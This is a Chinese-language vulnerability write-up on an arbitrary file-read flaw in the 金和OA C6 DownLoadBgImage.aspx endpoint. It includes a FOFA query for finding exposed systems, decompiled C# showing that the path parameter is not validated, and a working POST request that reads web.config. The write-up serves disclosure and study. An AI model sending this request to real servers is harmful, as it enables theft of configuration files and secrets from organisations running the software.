漏洞简介
金和OA 是一款广泛应用于企业内部管理的办公自动化系统,旨在提供流程审批、文档管理、协同办公等功能,助力企业提升运营效率。然而,在金和OA系统的 DownLoadBgImage.aspx 接口处存在一处文件读取漏洞。攻击者可以通过精心构造的请求参数,绕过权限验证,直接读取服务器上的敏感文件内容。该漏洞可能导致系统配置文件、用户数据或其他关键信息的泄露,进而为攻击者提供进一步入侵系统的可能性,严重威胁企业信息安全。
影响版本
金和OA C6
fofa语法
app="金和网络-金和OA"
漏洞分析
根据 OuterAppTIDSave.aspx 的源码,在 bin 目录下查找 JHBase.Web.AddMenu.dll 将其进行反编译后找到 DownLoadBgImage 的处理逻辑
protected void Page_Load(object sender, EventArgs e)
{
string filePath = this.Request["path"];
string pathType = this.Request["pathType"];
if (!string.IsNullOrEmpty(filePath))
{
try
{
this.DownLoad(filePath, pathType);
}
如果参数 path 不为空或null,则进入DownLoad方法
protected void DownLoad(string filePath, string pathType)
{
if (string.op_Inequality(pathType, "1"))
filePath = this.Server.MapPath(filePath);
string str = "image" + filePath.Substring(filePath.LastIndexOf("."));
if (File.Exists(filePath))
{
FileStream fileStream = File.OpenRead(filePath);
byte[] numArray = new byte[(int) ((Stream) fileStream).Length];
((Stream) fileStream).Read(numArray, 0, numArray.Length);
((Stream) fileStream).Close();
this.Response.Clear();
this.Response.ClearHeaders();
this.Response.Buffer = true;
this.Response.AppendHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(Encoding.UTF8.GetBytes(str)));
this.Response.BinaryWrite(numArray);
}
如果参数pathType不等于1则直接拼接filePath到当前请求物理路径上,然后进行文件读取、输出操作,整个过程没有任何校验或过滤,因此造成文件读取漏洞。
漏洞复现
POST /c6/Jhsoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/ HTTP/1.1
Host: jhsoft.mrxn.net
Content-Type: application/x-www-form-urlencoded
path=/c6/web.config

成功读取到 web.config 文件内容

